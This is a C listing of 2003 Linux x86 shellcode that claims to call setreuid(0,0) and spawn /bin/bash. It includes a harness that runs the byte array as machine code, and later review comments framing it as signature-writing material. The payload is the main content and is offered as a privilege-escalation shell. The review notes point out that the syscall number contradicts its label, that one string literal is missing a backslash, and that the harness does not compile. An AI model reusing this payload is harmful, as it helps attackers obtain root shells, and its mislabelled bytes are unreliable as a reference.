Linux x86 shellcode (48 bytes) which does setreuid(0,0); execve("/bin/bash", NULL); exit(0);
9b5c6592a60521c7b883d20faff2a3b2f672c2706732bafb65e60fe26cd543f8
/*
* (c) ROSIELLO SECURITY 2003
* &
* DTORS SECURITY 2003
*
* Linux x86 shellcode 48 bytes
* setreuid(0,0);
* execve("/bin/bash", NULL);
* exit(0);
*--------------------------------------------------------------------------
* AUTHOR : Angelo Rosiello
* CONTACT: angelo@rosiello.org, angelo@dtors.net, rosiello.angelo@virgilio.it
* URL : http://www.rosiello.org
*
*/
#include <unistd.h>
/*
 * shellcode: i386 Linux machine code stored as a byte string.
 * Per the author's header it is meant to issue three int $0x80 system calls
 * in sequence: setreuid(0, 0), execve of /bin/bash, then exit. It uses only
 * stack-relative addressing and builds its path string on the stack.
 * The per-line comments are the author's AT&T-syntax disassembly. The
 * NOTE(review) lines mark places where the bytes and the stated intent
 * differ, which matters when this listing is used to write or validate a
 * detection signature: match on the bytes, not on the description.
 */
char shellcode[] =
//setreuid(0, 0);
"\x31\xc0" // xor %eax, %eax
"\xb0\x70" // movb $0x70, %al   (system call number in %al)
// NOTE(review): 0x70 is 112 decimal. Check the i386 syscall table before
// trusting the setreuid label; the header may describe intent, not the bytes.
"\x31\xdb" // xor %ebx, %ebx    (first argument = 0)
"\x31\xc9" // xor %ecx, %ecx    (second argument = 0)
"\xcd\x80" // int $0x80
//execve("/bin/bash", NULL)
// NOTE(review): the code below builds a two-entry pointer array {path, 0} in
// %ecx and points %edx at a zero dword, so the call carries more than the
// single NULL the header shows.
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax             (zero dword; later addressed through %edx)
"\x6a\x68" // pushl $0x68       ('h' plus three zero bytes: end of the path)
"\x68\x2f\x62\x61\x73" // push $0x7361622f   ("/bas")
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f   ("/bin")
"\x89\xe3" // mov %esp,%ebx     (%ebx = address of "/bin/bash")
"\x8d\x54\x24\x0c" // lea 0xc(%esp, 1), %edx   (%edx = address of the zero dword pushed first)
"\x50" // push %eax             (terminating 0 of the pointer array)
"\x53" // push %ebx             (pointer to the path)
"\x8d\x0c\x24" // lea (%esp,1),%ecx   (%ecx = address of {path, 0})
"\xb0\x0b" // mov $0xb,%al      (system call number 11)
"\xcd\x80" // int $0x80
//exit(0);
// NOTE(review): the next literal has no backslash before "x31", so it encodes
// the ASCII characters 'x', '3', '1' followed by 0xc0 (four bytes), not the
// two-byte xor shown in its comment. The 48-byte length in the title matches
// the literal as written; count the bytes yourself when sizing a signature.
"x31\xc0" // xor %eax, %eax     (author's intended instruction; see note above)
"\xb0\x01" // movb $0x1, %al    (system call number 1)
"\xcd\x80"; // int $0x80
/*
 * Test harness: points a function pointer at the shellcode array and calls
 * it, so the bytes in the array are executed as machine code inside this
 * process. Declared without a return type (pre-C99 implicit int) and has no
 * return statement.
 */
main()
{
void (*routine) ();
// A cast used as the target of an assignment: an old GCC extension that
// current compilers reject, so this line does not build as standard C.
(long) routine = &shellcode;
// Control transfers into a data array here. Presumably this faults on systems
// that map data pages non-executable; TODO confirm for the build in use.
routine();
}